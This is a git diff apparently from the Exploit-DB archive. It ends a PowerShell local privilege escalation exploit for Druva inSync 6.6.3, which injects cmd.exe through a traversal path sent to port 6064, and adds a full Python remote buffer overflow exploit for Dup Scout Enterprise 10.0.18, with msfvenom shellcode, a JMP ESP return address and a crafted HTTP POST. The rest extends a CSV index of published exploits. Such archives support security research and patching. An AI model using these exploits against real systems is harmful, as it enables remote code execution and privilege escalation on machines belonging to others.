+    [System.Net.Sockets.SocketType]::Stream,
+    [System.Net.Sockets.ProtocolType]::Tcp
+)
+$s.Connect("127.0.0.1", 6064)
+
+$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
+$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
+$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
+$length = [System.BitConverter]::GetBytes($command.Length);
+
+$s.Send($header)
+$s.Send($rpcType)
+$s.Send($length)
+$s.Send($command)
\ No newline at end of file
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
index 7c881a738..3b65609ac 100755
--- a/exploits/windows/remote/46697.py
+++ b/exploits/windows/remote/46697.py
@@ -71,6 +71,8 @@ def SendString(string,ip):
     for char in string:
         target = socket(AF_INET, SOCK_DGRAM)
         target.sendto(characters[char],(ip,1978))
+        sleep(0.5)
+
     
 
 
diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py
new file mode 100755
index 000000000..809e75ea0
--- /dev/null
+++ b/exploits/windows/remote/49210.py
@@ -0,0 +1,63 @@
+# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
+# Requires web service to be enabled.
+# Tested on Windows 10 Pro (x64)
+# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
+# Credits: Tulpa and SICKNESS for original exploits
+# Modified: @0rbz_
+
+import socket,os,time,struct,argparse,sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required=True)
+args = parser.parse_args()
+
+host = args.host
+port = 80
+
+# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
+
+buf =  ""
+buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
+buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
+buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
+buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
+buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
+buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
+buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
+buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
+buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
+buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
+buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
+buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
+buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
+buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
+buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
+buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
+buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
+
+buffer = "\x41" * 260
+buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
+buffer += "\x90" * 20
+buffer += buf
+buffer += "\x90" * (10000 - len(buffer))
+
+evil =  "POST /online_registration HTTP/1.1\r\n"
+evil += "Host: " + sys.argv[2] +"\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "customer_name=" + buffer
+evil += "&unlock_key=" + buffer + "\r\n"
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((host,port))
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d8fd509ac..9334b50e4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
+49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
 49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
+49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
 49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@@ -11218,9 +11221,13 @@ id,file,description,date,author,type,platform,port
 49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
+49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
 49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
+49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
+49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
+49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17886,6 +17893,7 @@ id,file,description,date,author,type,platform,port
 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
+49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
@@ -38777,7 +38785,7 @@ id,file,description,date,author,type,platform,port
 39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
-39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
+39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
 39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
 39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
 39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
@@ -43199,6 +43207,7 @@ id,file,description,date,author,type,platform,port
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
 48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI'  Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
+48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@@ -43255,6 +43264,7 @@ id,file,description,date,author,type,platform,port
 48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
 48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
 48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
 48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
 48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@@ -43324,6 +43334,7 @@ id,file,description,date,author,type,platform,port
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
 49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
 49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
 49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@@ -43391,6 +43402,7 @@ id,file,description,date,author,type,platform,port
 49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
 49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
 49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
+49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
 49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@@ -43402,6 +43414,7 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@@ -43418,3 +43431,8 @@ id,file,description,date,author,type,platform,port
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
 49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
 49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
+49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
+49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
+49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,
+49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php,
+49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,